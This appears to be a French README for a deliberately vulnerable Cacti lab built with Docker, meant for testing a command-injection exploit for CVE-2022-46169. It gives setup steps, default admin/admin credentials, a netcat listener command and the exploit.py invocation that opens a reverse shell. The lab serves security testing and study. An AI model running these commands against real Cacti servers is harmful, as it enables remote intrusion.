
AVERTISSEMENT : Ceci est une application vulnérable permettant de tester l'exploit de l'injection de commande Cacti (CVE-2022-46169). Exécutez-la à vos propres risques !
Ceci est une application vulnérable permettant de tester l'exploit de la vulnérabilité Cacti (CVE-2022-46169).
Cette application contient de sérieuses vulnérabilités de sécurité. Exécutez-la à vos risques et périls ! Il est recommandé d'utiliser un environnement sauvegardé et isolé (comme une machine virtuelle avec un instantané récent et un réseau host-only). Ne téléversez pas cette application sur des serveurs exposés à Internet, car ils seraient compromis.
AVERTISSEMENT: Je ne suis pas responsable de la manière dont quiconque utilise cette application. L'unique but de cette application est de servir de scénario de test pour l'exploit de la CVE-2022-46169 et elle ne doit pas être utilisée de manière malveillante. Si votre serveur est compromis par une installation de cette application, ce n'est pas ma responsabilité, mais celle de la ou des personnes qui l'ont téléversée et installée.
Voici les étapes pour configurer l'environnement :
docker compose up -d pour démarrer la composition.admin/admin.Le conteneur s'appellera vuln-cacti.
Pour supprimer l'environnement, utilisez la commande docker compose down.
Le guide d'installation officiel de Cacti est disponible ici.
Une analyse détaillée de la cause racine de la vulnérabilité est disponible ici.
Un exploit public est disponible sur Exploit-DB. Il a été copié dans le dossier exploit/ pour plus de simplicité.
Pour l'exécuter :
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
host.docker.internal est utilisé pour atteindre la machine hôte depuis le conteneur (référence).Il existe également une entrée dans le dépôt vulhub.
Ce projet est sous licence Unlicense - voir le fichier LICENSE pour plus de détails.